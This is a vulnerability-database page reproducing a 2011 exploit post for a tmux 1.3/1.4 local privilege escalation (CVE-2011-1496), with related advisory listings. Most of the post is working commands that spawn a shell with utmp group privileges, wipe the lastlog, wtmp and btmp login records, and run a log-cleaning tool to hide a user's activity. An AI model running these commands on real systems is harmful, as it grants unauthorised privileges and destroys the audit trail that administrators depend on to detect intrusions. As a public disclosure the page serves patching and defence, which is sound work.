Lucene search

K

tmux 1.3 / 1.4 Privilege Escalation

🗓️ 11 Apr 2011 00:00:00Reported by ph0x90bicType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 804 Views

tmux 1.3/1.4 Privilege Escalation, utmp group privileges, local root access, logfiles manipulatio

Show more
Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2011-1496
18 Apr 201118:55
cve
NVD
CVE-2011-1496
18 Apr 201118:55
nvd
securityvulns
[SECURITY] [DSA 2212-1] tmux security update
11 Apr 201100:00
securityvulns
OpenVAS
Fedora Update for tmux FEDORA-2011-5167
21 Apr 201100:00
openvas
OpenVAS
Fedora Update for tmux FEDORA-2011-5156
21 Apr 201100:00
openvas
OpenVAS
Fedora Update for tmux FEDORA-2011-5156
21 Apr 201100:00
openvas
OpenVAS
Debian Security Advisory DSA 2212-1 (tmux)
12 May 201100:00
openvas
OpenVAS
Debian: Security Advisory (DSA-2212-1)
12 May 201100:00
openvas
OpenVAS
Fedora Update for tmux FEDORA-2011-5167
21 Apr 201100:00
openvas
Tenable Nessus
Fedora 13 : tmux-1.4-3.fc13 (2011-5156)
19 Apr 201100:00
nessus
Rows per page
`---------------------------------------  
| Team ph0x90bic proudly presents |  
| tmux -S 1.3/1.4 local utmp exploit |  
---------------------------------------  
  
# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability  
# Date: 11.04.2011  
# Author: ph0x90bic  
# Software Link: http://tmux.sourceforge.net/  
# Version: 1.3/1.4  
# Tested on: Linux debian 2.6.26-1-686  
# CVE : CVE-2011-1496  
  
---  
  
INTRODUCTION  
  
tmux 1.3/1.4 contains a privilege escalation vulnerabillity,  
which gives you utmp group privileges. This bug is important,  
because it is possible to clean logfiles and use logcleaners  
for btmp, wtmp and lastlog without local root access.  
  
---  
  
EXPLOIT  
  
Execute shell as utmp group  
  
$ tmux -S /tmp/.whateveryouwant -c id  
uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)  
  
$ tmux -S /tmp/.whateveryouwant -c /bin/sh  
$ id  
uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)  
  
--  
  
Delete logfiles  
  
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog'  
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp'  
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp'  
  
--  
  
Use logcleaner software  
  
$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Apr 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.001
804
.json
Report